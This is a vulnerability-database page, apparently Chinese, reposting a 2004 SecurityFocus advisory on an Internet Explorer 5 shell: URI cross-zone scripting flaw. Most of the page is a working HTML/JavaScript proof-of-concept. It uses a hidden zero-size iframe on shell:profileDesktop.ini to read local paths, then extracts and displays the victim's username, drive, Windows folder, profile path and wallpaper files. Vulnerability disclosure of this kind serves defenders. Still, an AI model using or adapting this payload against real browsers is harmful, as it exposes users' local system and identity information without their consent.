Microsoft Internet Explorer 5 – Shell: IFrame Cross-Zone Scripting (1)
漏洞ID | 1054388 | 漏洞类型 | |
发布时间 | 2004-02-10 | 更新时间 | 2004-02-10 |
CVE编号 | N/A |
CNNVD-ID | N/A |
漏洞平台 | Windows | CVSS评分 | N/A |
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/9628/info
It has been alleged that Microsoft Internet Explorer is prone to a weakness that may potentially allow for the execution of hostile script code in the context of the My Computer Zone. This issue is related to how shell: URIs are handled by the browser. It should also be noted that shell: URIs may be used to reference local content in the same manner as file:// URIs.
Update: Although unconfirmed, further reports indicate that MSN messenger version 6.2.0137, Microsoft Word, Outlook 2003, and Outlook Express may also potentially provide exploitation vectors for this vulnerability.
<html>
<head>
</head>
<body onload=setTimeout("exploit()",4*100);>
<iframe id="Target" width="0" height="0"
src="shell:profileDesktop.ini" name="Target" scrolling="yes">
</iframe>
<SCRIPT language=JavaScript>
function exploit(){
loc=new String(Target.location);
var len=loc.length
var n=loc.indexOf("Settings")+9;
var m=loc.indexOf("System32");
preuser=new String(loc.substring(n,len));
p=preuser.indexOf("\");
user=new String(preuser.substring(0,p));
winloc=new String(loc.substring(6,m));
q=winloc.indexOf("\");
rootdrive=new String(winloc.substring(0,q+1));
targetwin=window.open("");
targetwin.document.write("<b>Username :</b> "+user+"<br>");
targetwin.document.write("<b>root drive :</b> "+rootdrive+"<br>")
targetwin.document.write("<b>location of windows folder :</b>
"+winloc+"<br>")
targetwin.document.write("<b>location of user profile
:</b>"+rootdrive+"Documents and Settings\"+user+"\");
targetwin.document.write("<br><br><b>Wallpaper :</b><br><br><img
border=0 src='"+rootdrive+"Documents and Settings\"+user+"\Local
Settings\Application Data\Microsoft\Wallpaper1.bmp' width=30%
height=30%>")
targetwin.document.write("<br><br><b>internet explorer wallpaper
:</b><br><br><img border=0 src='"+rootdrive+"Documents and
Settings\"+user+"\Application Data\Microsoft\Internet
Explorer\Internet Explorer Wallpaper.bmp' width=30%
height=30%><br><br>")
}
</SCRIPT>
</body>
</html>
相关推荐: XInet K-AShare XKAS Program World Writable Icon Directory Vulnerability
XInet K-AShare XKAS Program World Writable Icon Directory Vulnerability 漏洞ID 1102539 漏洞类型 Access Validation Error 发布时间 2002-01-28 …
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
恐龙抗狼扛1年前0
kankan啊啊啊啊3年前0
66666666666666